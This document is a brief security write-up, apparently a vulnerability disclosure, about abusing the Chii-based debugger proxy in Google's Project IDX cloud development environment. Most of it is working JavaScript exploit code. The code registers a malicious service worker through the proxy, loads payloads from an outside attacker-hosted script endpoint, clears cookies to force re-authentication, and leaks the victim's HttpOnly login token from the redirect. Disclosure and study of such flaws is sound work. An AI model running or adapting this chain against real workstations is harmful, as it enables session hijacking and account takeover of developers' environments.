Writeups

This is a hosted development environment called Project IDX based on Visual Studio Code like Google Cloud Shell

Feature being abused: https://developers.google.com/idx/guides/debug-in-idx#chrome-devtools
Its based of the Chii open source project: https://github.com/liriliri/chii/commit/0002b761737f450fe070699b6fec284d6e1e91e9

// Vulnerable debugger proxy (Runs any js code you want, Fetch as the victims server)
let target = 'https://8282-monospace-<ID>.cloudworkstations.dev/proxy?url=';

// Link to our service worker
let proxy = new URL('https://terjanq.me/xss.php');
proxy.searchParams.set('ct', 'application/javascript');
proxyPayload = `
self.addEventListener("fetch", (event) => {
 let url = event.request.url;
 // Leak token from redirect since its a httponly cookie
  // Authentication is done by:
 // Redirecting the user to https://ssh.cloud.google.com/devshell/gateway/oauth?state=<value> (Cross-site, COOP, embed protection)
 // https://<PORT>-idx-<ID>.cloudworkstations.dev/_workstation/login?redirect=<value> this sets a cookie then redirects back.
 if (url.includes("_workstation/login")) {
  console.info('🎉 Leaked token: '+url);
 }
});
`;
proxy.searchParams.set('html', proxyPayload);

// Link to force a re-authenticate
let reauth = new URL('https://terjanq.me/xss.php');
reauth.searchParams.set('h[Clear-Site-Data]', '"cookies"');
reauthPayload = `
setTimeout(() => { location.href=location.origin }, 3000);
`;
reauth.searchParams.set('js', reauthPayload);

// Link to create service worker
let setup = new URL('https://terjanq.me/xss.php');
setupPayload = `
navigator.serviceWorker.register("${target + encodeURIComponent(proxy.href)}");
setTimeout(() => { location.href="${target + encodeURIComponent(reauth.href)}" }, 3000);
`;
setup.searchParams.set('js', setupPayload);

// Do the stuff
location = target + encodeURIComponent(setup.href);
Improve this page